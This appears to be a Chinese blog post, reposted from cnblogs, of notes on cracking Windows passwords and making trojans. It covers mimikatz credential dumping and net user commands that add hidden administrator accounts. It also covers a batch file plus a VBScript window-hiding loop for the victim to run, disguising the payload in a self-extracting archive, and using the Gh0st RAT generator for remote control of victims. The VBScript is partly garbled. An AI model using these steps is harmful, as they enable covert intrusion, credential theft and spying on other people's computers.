• Windows系统密码破解和木马制作


    Windows系统密码破解

    • BIOS密码(拆机抠电池...)

    • 关机状态下(PC):

      • windows pe |大白菜|老毛桃
    • 正在开机的电脑密码破解

      • 控制台Windows日志记录所有的操作情况(清除Windows日志本身操作也被记录到日志里)

      • 无损的情况下知道Windows密码

        • mimikatez(猕猴桃):自动读取Windows密码(攻击服务器之后使用猕猴桃获得系统密码以合法身份入侵系统)这是一个猕猴桃(先关闭电脑杀毒软件)

        • 几个cmd命令:net user(查看当前电脑用户) net user [用户名] [密码] /add(增加一个用户) net user [用户名] /del(删除用户)net user [用户名]$ [密码] /add(增加隐形用户)

        • 增加用户后提权:

        • net localgroup users administrators [用户名]

        • net localgroup users [用户名] /del删除user中的用户是此用户成为真正的管理员用户,提权成功!

        • CMD输入net share查看共享情况

          • 给系统开共享:net share [name]=[目标盘符,如C:]
          • net share [name] /del 删除共享
          • net view查看内网(局域网)开了共享的计算机名,用映射网络驱动器连接对方系统共享,将对方系统内容共享到自己系统(需要提权)
        • 使用Powershell关掉对方防火墙

        • 总结

          • 新建一个文本文档将上述命令输入,更改文件名为.bat,对方打开此文件即可获得对方电脑权限。

          • 接下来需要隐藏.bat运行时的黑框:

          新建.vbe:
          set ws=greatobject("wscript.shell")
          do
          ws.run "C:
          ame.bat",0
          wscript.sleep  9000
          loop
          
          • 将vbe文件添加压缩包(高级自解压到C盘,将文件进行隐藏和”化妆“更改图标)|msi静默安装包

          • 很多合法软件都可以做feifa的事情

          基础知识

        远程管理程序|木马

        • this is a muma|Gh0st RAT Beta ,C++写的开源木马生成器(GayHub有源码)可以去做逆向工程免杀
          • 监听端口|上线主机(IP)|两个端口一致
          • 动态域名(DDNS):花生壳(下载软件,注册送动态域名--》公网ip)|租一台公网VPS
          • 生成.exe(自己不要点|自己中自己的木马)
          • 别人点了之后就可以通过Gh0st远程控制对方计算机
            • 可以监听对方语音,视频,查看删除文件,访问网址,清除日志,下载更新,下载执行
  • 相关阅读:
    执行上下文和作用域,作用域链
    学习笔记一:定位
    exports和module.exports的区别——学习笔记
    伪类和伪元素
    visibility和display
    CSS选择器,层叠
    Servlet乱码处理-------续集
    Servlet的乱码处理手记
    前端框架之Semantic UI
    最完整的Oracle11g 概述
  • 原文地址:https://www.cnblogs.com/Weber-security/p/12740247.html
Copyright © 2020-2023  润新知